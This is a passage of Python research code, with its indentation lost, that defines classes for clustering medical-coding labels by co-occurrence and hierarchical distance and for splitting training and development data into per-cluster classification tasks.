sorted_key_list = sorted(dict_len.items(), key=operator.itemgetter(1))
sorted_dict = [tuple([item[0], dict[item[0]]]) for item in sorted_key_list]
return sorted_dict
class MC2CLabelClusterer():
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=False):
self.data_dir = data_dir
self.hierarchical_data_dir = 'data/hierarchical_data/'
self.hierarchical_data_dir += 'cantemist/' if 'cantemist' in self.data_dir else ''
self.hierarchical_data_dir += 'es/' if 'spanish' in self.data_dir else ''
self.hierarchical_data_dir += 'de/' if 'german' in self.data_dir else ''
self.data_type = ''
self.load_data('train')
self.load_data('dev')
self.add_none = add_none
self.train_ids = [d[0] for d in self.train_data]
self.dev_ids = [d[0] for d in self.dev_data]
self.max_freq_threshold = max_freq_threshold
self.m = len(self.train_data[0][2]) # num labels
self.n = len(self.train_data) # num docs
self.E = np.zeros((self.n, self.m))
self.C = np.zeros((self.m, self.m))
self.create_E_matrix()
self.power_dict = dict() # per-label clustering power dictionary
self.clusters = defaultdict(set) # dict of {seed: {label1, ..., labeln},...}
self.loners = set() # those labels which get their own single binary classifier
self.doc_id2activated_clusters = defaultdict(set) # dictionary mapping doc_id --> relevant clusters
self.max_cluster_size = max_cluster_size
self.min_cluster_size = min_cluster_size
self.n_c = (self.m // (self.max_cluster_size - 1)) + 1
self.cluster_class_counts = dict()
self.label_class_counts = dict()
self.overall_idx2cluster_idx = defaultdict(dict)
self.cluster_idx2overall_idx = defaultdict(dict)
self.out_dir = os.path.join(self.data_dir,
'MCC/{}_{}_{}_{}'.format(self.min_cluster_size, self.max_cluster_size,
self.max_freq_threshold, self.add_none))
self.mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
if not os.path.exists(os.path.join(self.data_dir, 'MCC/')):
os.mkdir(os.path.join(self.data_dir, 'MCC/'))
try:
self.C = pickle.load(
open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
except:
self.compute_C_matrix()
self.delta = self.n_c / self.m
self.epsilon = 0.001
def load_data(self, data_type):
self.train_data = pickle.load(open(os.path.join(self.data_dir, 'train_0_False.p'.format(data_type)), 'rb'))
self.dev_data = pickle.load(open(os.path.join(self.data_dir, 'dev_0_False.p'.format(data_type)), 'rb'))
def create_E_matrix(self):
try:
for i, (doc_id, text, labels, ranks) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
except:
for i, (doc_id, text, labels) in enumerate(self.train_data):
# labels = np.append(labels, np.array([0]))
self.E[i, :] = labels
def compute_C_matrix(self):
"""
Creates a co-occurrence matrix from self.E
:return:
"""
print("Computing Co-occurrence Matrix for Label Clustering...")
for i in trange(self.m):
for j in range(self.n):
co_occurrences = set(np.nonzero(self.E[j, :])[0])
if i not in co_occurrences:
continue
else:
for l in co_occurrences:
self.C[i, l] = 1
pickle.dump(self.C, open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n,
self.add_none)), 'wb'))
def generate_clusters_by_freq(self):
"""
Generates clusters such that the frequencies are as close as possible within the clusters, while maintaining
mututal exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold) # maximum absolute frequency we'll allow in order for a code
# to make it in to a cluster
self.loners = {d[0] for d in freqs if d[1] > max_count} # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
for entry in freqs: # iterate over every label we didn't discard due to high-freq
seed = entry[0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
labels = [l[0] for l in freqs if l[0] in labels and l[0] in remaining_labels] # gives us the eligible
# labels in descending freq
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
self.clusters[seed] = cluster + [seed] # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
self.clusters[l] = [l]
try:
temp = self.clusters.deepcopy()
to_remove = set()
# now, we want to find those left over, low-frequency codes which ended up alone in their own cluster; the idea
# is to find a cluster we could add them to, which may cause the max_cluster_size to be exceeded by 1 or 2,
# but I feel it's better than leaving them on their own, if we want to employ an LDAM loss function
# sometimes, this doesn't work though and then certain labels are left without a cluster, thus the
# try/except
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
# if label == seed2 or seed2 in self.loners:
if seed == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
temp[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del temp[r]
assert len(self.mlb.classes_) == len([l for label_list in self.clusters.values() for l in label_list]), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
self.clusters = temp
except:
pass
assert len(self.mlb.classes_) == len([l for label_list in self.clusters.values() for l in label_list]), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
def compute_label_freqs(self):
label_freq_dict = {i: np.sum(self.E[:, i]) for i in range(self.m)}
return label_freq_dict
def make_cluster_idx2general_idx_dict(self):
"""
Creates a dictionary which maps between the global index of a label and the local (inner-cluster-specific)
index. The seed is what identifies a cluster, and this gives us a way to map between what labels are at
what indices within a cluster
:return:
"""
for seed, cluster in self.clusters.items():
for i, c in enumerate(cluster):
self.overall_idx2cluster_idx[seed][c] = i # {Seed: {mlb label idx: inner-cluster idx,...},...}
self.cluster_idx2overall_idx[seed][i] = c # {Seed: {inner-cluster idx: mlb label idx,...},...}
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_freq()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2]
labels = np.nonzero(label_matrix)[0].tolist()
activated_clusters = [seed for seed, cluster in self.clusters.items() if bool(set(labels) & set(cluster))]
if self.data_type == 'train':
assert len(labels) == len(
activated_clusters), "Sorry, mismatch with labels {} and activated clusters {}, " \
"document {}".format('|'.join([str(l) for l in labels]),
'|'.join([str(a) for a in
activated_clusters]),
doc_id)
for seed in activated_clusters:
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MLCC using BR
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
label_matrix[new_cluster_specific_label_idx] = 1
# if self.data_type == 'train':
# print(label_matrix)
data_dict[seed].append((doc_id, text, label_matrix))
for seed, data in data_dict.items():
if not os.path.exists(os.path.join(self.out_dir, str(seed))):
os.mkdir(os.path.join(self.out_dir, str(seed)))
with open(os.path.join(self.out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
for entry in data:
# if self.data_type == 'train':
# lab_idx = np.nonzero(entry[-1])[0].item()
# self.label_class_counts[seed][lab_idx] += 1 # for class counts
self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2]
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + entry[1] + '\t' + lab + '\n')
pickle.dump(temp, open(os.path.join(self.out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
def split_into_cluster_prediction_data(self):
self.seed2cluster_idx = {c: i for i, c in enumerate(self.clusters.keys())}
self.cluster_idx2seed = {i: c for i, c in enumerate(self.clusters.keys())}
temp = []
with open(os.path.join(self.out_dir, 'doc_ids2clusters.p'), 'wb') as pickle_f, \
open(os.path.join(self.out_dir, 'doc_ids2clusters.tsv'), 'w') as f:
for doc_id in self.train_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(doc_id + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
for doc_id in self.dev_ids:
activated_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(activated_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in activated_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(str(doc_id) + '\t' + '|'.join([str(a) for a in activated_clusters]) + '\n')
pickle.dump(self.doc_id2activated_clusters, pickle_f)
pickle.dump(self.seed2cluster_idx, open(os.path.join(self.out_dir, 'seed2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2seed, open(os.path.join(self.out_dir, 'cluster_idx2seed.p'), 'wb'))
print("Average number of activated clusters per input doc:", np.mean(temp))
print("Total number of clusters:", len(self.clusters))
def generate_preliminary_exp_data(self):
PRELIMINARY_EXP_DATA = []
with open(os.path.join(self.out_dir, 'train.p'), 'wb') as pf:
for d in self.train_data:
PRELIMINARY_EXP_DATA.append((d[0], d[1], self.doc_id2activated_clusters[d[0]]))
pickle.dump(PRELIMINARY_EXP_DATA, pf)
def compute_class_counts(self):
# label_class_counts = dict()
# for seed, idx2count_dict in self.label_class_counts.items():
# label_class_counts[seed] = [idx2count_dict[k] for k in sorted(idx2count_dict)]
# print(label_class_counts)
cluster_class_counts = {seed: sum(counts) for seed, counts in self.label_class_counts.items()}
cluster_class_counts = [cluster_class_counts[self.cluster_idx2seed[i]] for i in
range(len(cluster_class_counts))]
cluster_class_counts = [(self.n - c) / c for c in cluster_class_counts]
label_class_counts = {self.seed2cluster_idx[k]: v for k, v in self.label_class_counts.items()}
# the inner-cluster class counts are now in a dictionary where they are looked up by their index in the
# MLCC step, rather then by their seed
pickle.dump(label_class_counts, open(os.path.join(self.out_dir, 'local_class_counts.p'), 'wb'))
pickle.dump(cluster_class_counts, open(os.path.join(self.out_dir, 'global_cluster_counts.p'), 'wb'))
def generate_activated_clusters_for_dev_data(self):
print(self.clusters)
pass
def main(self):
if not os.path.exists(self.out_dir):
os.mkdir(self.out_dir)
self.split_data_by_clusters('train')
self.split_data_by_clusters('dev')
self.split_into_cluster_prediction_data()
self.generate_preliminary_exp_data()
self.compute_class_counts()
pickle.dump(self.clusters, open(os.path.join(self.out_dir, 'clusters.p'), 'wb'))
else:
self.clusters = pickle.load(open(os.path.join(self.out_dir, 'clusters.p'), 'rb'))
class MC2CLabelClusterer_None(MC2CLabelClusterer):
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=True):
MC2CLabelClusterer.__init__(self, data_dir, max_cluster_size=max_cluster_size,
min_cluster_size=min_cluster_size,
max_freq_threshold=max_freq_threshold, add_none=add_none)
try:
self.C = pickle.load(
open(os.path.join(self.data_dir, 'MCC/C_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
except:
self.compute_C_matrix()
def generate_clusters_by_freq(self):
"""
Generates clusters such that the frequencies are as close as possible within the clusters, while maintaining
mututal exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold) # maximum absolute frequency we'll allow in order for a code
# to make it in to a cluster
self.loners = {d[0] for d in freqs if d[1] > max_count} # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
non_overlap_dict[self.m] = [f[0] for f in freqs] # None label co-occurs with nothing
for entry in freqs: # iterate over every label we didn't discard due to high-freq
seed = entry[0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
labels = [l[0] for l in freqs if l[0] in labels and l[0] in remaining_labels] # gives us the eligible
# labels in descending freq
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
cluster = cluster + [self.m]
# cluster = [self.m] + cluster
self.clusters[seed] = [seed] + cluster # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
# self.clusters[l] = [self.m, l]
self.clusters[l] = [l, self.m]
try:
temp = self.clusters.deepcopy()
to_remove = set()
# now, we want to find those left over, low-frequency codes which ended up alone in their own cluster; the idea
# is to find a cluster we could add them to, which may cause the max_cluster_size to be exceeded by 1 or 2,
# but I feel it's better than leaving them on their own, if we want to employ an LDAM loss function
# sometimes, this doesn't work though and then certain labels are left without a cluster, thus the
# try/except
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
# if label == seed2 or seed2 in self.loners:
if seed == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
temp[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del temp[r]
assert len(self.mlb.classes_)+1 == len({l for label_list in self.clusters.values() for l in label_list}), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
self.clusters = temp
except:
pass
assert len(self.mlb.classes_)+1 == len({l for label_list in self.clusters.values() for l in label_list}), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_freq()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
mlb.classes_ = np.append(mlb.classes_, np.array(['None']))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2] # e.g. if we have only 10 labels total [0, 1, 0, 0, 0, 1, 1, 0, 0, 0]
labels = np.nonzero(label_matrix)[0].tolist() # [1, 5, 6]
for seed in self.clusters.keys(): # for cluster in clusters
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MCC
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
if not filtered_labels: # if there is no true label in the activate cluster, make it the 'None' label
filtered_labels = {self.m}
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
# now we mapped from the pos labels from the entire label space, to those which are positive
# within the specific cluster we're focusing on; here, most of the pos labels will be in the -1
# index, since we made 'None' -1 everywhere (in each cluster, in mbl.classes_...)
label_matrix[new_cluster_specific_label_idx] = 1
if data_type == self.train_data:
assert np.sum(label_matrix) == 1, "There is more than one active label in the cluster."
data_dict[seed].append((doc_id, text, label_matrix))
"""
Okay anything from here down I gotta redo; I need to make sure that when 'None' is the true label in a
cluster, that the cluster activator has a 0 for that cluster.
"""
for seed, data in data_dict.items():
# for cluster, [(doc_id, text, label_matrix_for_that_cluster), (doc_id, text, label_matrix_for_that_cluster)]
if not os.path.exists(os.path.join(self.out_dir, str(seed))):
os.mkdir(os.path.join(self.out_dir, str(seed)))
with open(os.path.join(self.out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
# print(seed, all_labs_counts)
for entry in data: # iterate over the different (doc_id, text, label_matrix_for_that_cluster)
if entry[-1][-1] != 1: # make sure 'None' isn't the pos label
self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2] # {doc_id: label_matrix_for_that_cluster}
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + str(entry[1]) + '\t' + str(lab) + '\n')
pickle.dump(temp, open(os.path.join(self.out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
def split_into_cluster_prediction_data(self):
self.seed2cluster_idx = {c: i for i, c in enumerate(self.clusters.keys())}
self.cluster_idx2seed = {i: c for i, c in enumerate(self.clusters.keys())}
temp = []
with open(os.path.join(self.out_dir, 'doc_ids2clusters.p'), 'wb') as pickle_f, \
open(os.path.join(self.out_dir, 'doc_ids2clusters.tsv'), 'w') as f:
for doc_id in self.train_ids:
true_pos_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(true_pos_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters)) # make empty vector of length n_clusters
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in true_pos_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(doc_id + '\t' + '|'.join([str(a) for a in true_pos_clusters]) + '\n')
for doc_id in self.dev_ids:
true_pos_clusters = self.doc_id2activated_clusters[doc_id]
temp.append(len(true_pos_clusters))
vectorized_activated_clusters = np.zeros(len(self.clusters))
vectorized_activated_clusters[[self.seed2cluster_idx[i] for i in true_pos_clusters]] = 1
self.doc_id2activated_clusters[doc_id] = vectorized_activated_clusters
f.write(str(doc_id) + '\t' + '|'.join([str(a) for a in true_pos_clusters]) + '\n')
pickle.dump(self.doc_id2activated_clusters, pickle_f)
pickle.dump(self.seed2cluster_idx, open(os.path.join(self.out_dir, 'seed2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2seed, open(os.path.join(self.out_dir, 'cluster_idx2seed.p'), 'wb'))
print("Average number of activated clusters per input doc:", np.mean(temp))
print("Total number of clusters:", len(self.clusters))
def compute_class_counts(self):
cluster_class_counts = {seed: sum(counts[:-1]) for seed, counts in self.label_class_counts.items()}
cluster_class_counts = [cluster_class_counts[self.cluster_idx2seed[i]] for i in
range(len(cluster_class_counts))]
cluster_class_counts = [(self.n - c) / c for c in cluster_class_counts]
label_class_counts = {self.seed2cluster_idx[k]: v for k, v in self.label_class_counts.items()}
# the inner-cluster class counts are now in a dictionary where they are looked up by their index in the
# MLCC step, rather then by their seed
pickle.dump(label_class_counts, open(os.path.join(self.out_dir, 'local_class_counts.p'), 'wb'))
pickle.dump(cluster_class_counts, open(os.path.join(self.out_dir, 'global_cluster_counts.p'), 'wb'))
class MC2CHierarchicalLabelClusterer_None(MC2CLabelClusterer_None):
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=False):
super(MC2CHierarchicalLabelClusterer_None, self).__init__(data_dir, max_cluster_size=max_cluster_size,
min_cluster_size=min_cluster_size,
max_freq_threshold=max_freq_threshold,
add_none=add_none)
self.out_dir = os.path.join(self.data_dir,
'MCC/{}_{}_{}_{}_Hierarchical_Clustering'.format(self.min_cluster_size,
self.max_cluster_size,
self.max_freq_threshold,
self.add_none))
try:
self.H = pickle.load(
open(os.path.join(self.data_dir, 'MCC/H_matrix_{}l_{}d_{}.p'.format(self.m, self.n, self.add_none)),
'rb'))
self.mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
self.class2idx = {cls: i for i, cls in enumerate(self.mlb.classes_)}
except:
self.compute_hierarchical_distances()
self.class2idx = {cls: i for i, cls in enumerate(self.mlb.classes_)}
def compute_hierarchical_distances(self):
self.H = np.zeros((self.m, self.m))
self.mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
all_classes = self.mlb.classes_
dc = DistanceComputer(self.hierarchical_data_dir)
print("Computing pairwise hierarchical distances between the labels...")
for i, class1 in enumerate(tqdm(all_classes)):
remaining_classes = all_classes[i + 1:]
for j, class2 in enumerate(remaining_classes):
class1_idx, class2_idx = i, j + i + 1
distance = dc.compute_distance(class1, class2)
self.H[class1_idx, class2_idx] = distance
self.H[class2_idx, class1_idx] = distance
pickle.dump(self.H, open(os.path.join(self.data_dir, 'MCC/H_matrix_{}l_{}d_{}.p'.format(self.m, self.n,
self.add_none)), 'wb'))
def generate_clusters_by_hierarchical_distance(self):
"""
Generates clusters such that the frequencies are as close as possible within the clusters, while maintaining
mututal exclusivity within each cluster
:return:
"""
unordered_freqs = self.compute_label_freqs() # dict of label: count
freqs = sorted(unordered_freqs.items(), key=operator.itemgetter(1), reverse=True) # list of tuples
# [(code, freq), ...] in descending order of frequency
max_count = max([d[1] for d in freqs]) if not self.max_freq_threshold else \
round(self.n * self.max_freq_threshold) # maximum absolute frequency we'll allow in order for a code
# to make it in to a cluster
self.loners = {d[0] for d in freqs if d[1] > max_count} # set of codes which are too high-freq for a cluster
freqs = [f for f in freqs if f[0] not in self.loners] # remove the loners from our frequency list
remaining_labels = {s[0] for s in freqs} # set of labels we can still cluster
non_overlap_dict = {l: np.where(self.C[l, :] == 0)[0].tolist() for l in
remaining_labels} # a dictionary for each
# label, {label: [list of labels which the key label never co-occurs with], ...}
non_overlap_dict[self.m] = [f[0] for f in freqs] # None label co-occurs with nothing
print("Generating hierarchical clusters...")
for entry in tqdm(freqs): # iterate over every label we didn't discard due to high-freq
seed = entry[0] # since we're starting with the most high-freq labels, whichever label we're on is the seed
labels = non_overlap_dict[seed] # labels which do not overlap with our chosen seed
if seed not in remaining_labels: # if we already assigned this label to a cluster, it can't be a seed
continue
else:
sorted_closeby_labels = np.argsort(self.H[seed, :])
labels = [l for l in sorted_closeby_labels if l in labels and l in remaining_labels] # gives us
# elegible labels in ascending distance from our seed
cluster = []
for lab in labels: # iterate over eligible labels...
non_overlaps = set(non_overlap_dict[lab]) # get the set of labels which current potential/eligible
# label doesn't co-occur with...
if set(cluster).issubset(non_overlaps): # make sure that none of the labels currently in the
# cluster co-occur with this label
cluster.append(lab)
if len(cluster) == self.max_cluster_size - 1: # if we reached the maximum cluster size, we're done
break
cluster = cluster + [self.m]
# cluster = [self.m] + cluster
self.clusters[seed] = [seed] + cluster # add to dict which keeps track of clusters by their seeds
remaining_labels -= set(self.clusters[seed]) # remove these clustered labels from our set of remaining
for l in self.loners: # make sure to add the loners which we discarded due to high freq; they simply form
# their own cluster
# self.clusters[l] = [self.m, l]
self.clusters[l] = [l, self.m]
try:
temp = self.clusters.deepcopy()
to_remove = set()
# now, we want to find those left over, low-frequency codes which ended up alone in their own cluster; the idea
# is to find a cluster we could add them to, which may cause the max_cluster_size to be exceeded by 1 or 2,
# but I feel it's better than leaving them on their own, if we want to employ an LDAM loss function
# sometimes, this doesn't work though and then certain labels are left without a cluster, thus the
# try/except
for seed, cluster in self.clusters.items():
if len(cluster) < self.min_cluster_size and seed not in self.loners:
for label in cluster:
non_overlaps = set(non_overlap_dict[label])
for seed2, cluster2 in self.clusters.items():
# if label == seed2 or seed2 in self.loners:
if seed == seed2 or seed2 in self.loners:
continue
else:
if set(cluster2).issubset(non_overlaps):
temp[seed2].append(label)
to_remove.add(seed)
break
for r in to_remove:
del temp[r]
assert len(self.mlb.classes_)+1 == len({l for label_list in self.clusters.values() for l in label_list}), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
self.clusters = temp
except:
pass
assert len(self.mlb.classes_)+1 == len({l for label_list in self.clusters.values() for l in label_list}), \
"The following labels are not in clusters: {}".format(set(self.mlb.classes_) -
set([self.mlb.classes_[l] for label_list in
self.clusters.values() for l in label_list]))
def split_data_by_clusters(self, data_type):
"""
Splits data such that each cluster (a separate MCC task) has its own dataset
:return:
"""
self.data_type = data_type
self.load_data(data_type)
if data_type == 'train':
self.generate_clusters_by_hierarchical_distance()
data_type = self.train_data
elif data_type == 'dev':
data_type = self.dev_data
mlb = pickle.load(open(os.path.join(self.data_dir, 'mlb_0_False.p'), 'rb'))
mlb.classes_ = np.append(mlb.classes_, np.array(['None']))
data_dict = defaultdict(list)
self.make_cluster_idx2general_idx_dict()
for item in data_type:
doc_id = item[0]
text = item[1]
label_matrix = item[2] # e.g. if we have only 10 labels total [0, 1, 0, 0, 0, 1, 1, 0, 0, 0]
labels = np.nonzero(label_matrix)[0].tolist() # [1, 5, 6]
for seed in self.clusters.keys(): # for cluster in clusters
label_matrix = np.zeros(len(self.clusters[seed])) # generate an empty matrix of cluster size to add
# binary labels to for MCC
filtered_labels = set(labels) & set(self.clusters[seed]) # determine which labels of this example are
# relevant to the currently activated cluster
if not filtered_labels: # if there is no true label in the activate cluster, make it the 'None' label
filtered_labels = {self.m}
new_cluster_specific_label_idx = [self.overall_idx2cluster_idx[seed][l] for l in filtered_labels]
# now we mapped from the pos labels from the entire label space, to those which are positive
# within the specific cluster we're focusing on; here, most of the pos labels will be in the -1
# index, since we made 'None' -1 everywhere (in each cluster, in mbl.classes_...)
label_matrix[new_cluster_specific_label_idx] = 1
if data_type == self.train_data:
assert np.sum(label_matrix) == 1, "There is more than one active label in the cluster."
data_dict[seed].append((doc_id, text, label_matrix))
"""
Okay anything from here down I gotta redo; I need to make sure that when 'None' is the true label in a
cluster, that the cluster activator has a 0 for that cluster.
"""
for seed, data in data_dict.items():
# for cluster, [(doc_id, text, label_matrix_for_that_cluster), (doc_id, text, label_matrix_for_that_cluster)]
if not os.path.exists(os.path.join(self.out_dir, str(seed))):
os.mkdir(os.path.join(self.out_dir, str(seed)))
with open(os.path.join(self.out_dir, str(seed), self.data_type + '.tsv'), 'w') as f:
file_name = os.path.join(str(seed), '{}_doc_id2gold.p'.format(self.data_type))
temp = dict()
if self.data_type == 'train':
all_labs = np.array([e[-1] for e in data])
self.label_class_counts[seed] = np.sum(all_labs, axis=0).tolist()
# print(seed, all_labs_counts)
for entry in data: # iterate over the different (doc_id, text, label_matrix_for_that_cluster)
if entry[-1][-1] != 1: # make sure 'None' isn't the pos label
self.doc_id2activated_clusters[entry[0]].add(seed)
temp[entry[0]] = entry[2] # {doc_id: label_matrix_for_that_cluster}
lab = self.cluster_idx2overall_idx[seed][np.nonzero(entry[2])[0][0]]
lab = mlb.classes_[lab]
f.write(str(entry[0]) + '\t' + str(entry[1]) + '\t' + str(lab) + '\n')
pickle.dump(temp, open(os.path.join(self.out_dir, file_name), 'wb'))
pickle.dump(self.overall_idx2cluster_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'overall_idx2cluster_idx.p'), 'wb'))
pickle.dump(self.cluster_idx2overall_idx[seed],
open(os.path.join(self.out_dir, str(seed), 'cluster_idx2overall_idx.p'), 'wb'))
class MC2CHierarchicalLabelClusterer(MC2CLabelClusterer):
def __init__(self, data_dir, max_cluster_size=10, min_cluster_size=5, max_freq_threshold=0.0, add_none=False):
super(MC2CHierarchicalLabelClusterer, self).__init__(data_dir, max_cluster_size=max_cluster_size,
min_cluster_size=min_cluster_size,
max_freq_threshold=max_freq_threshold,
add_none=add_none)
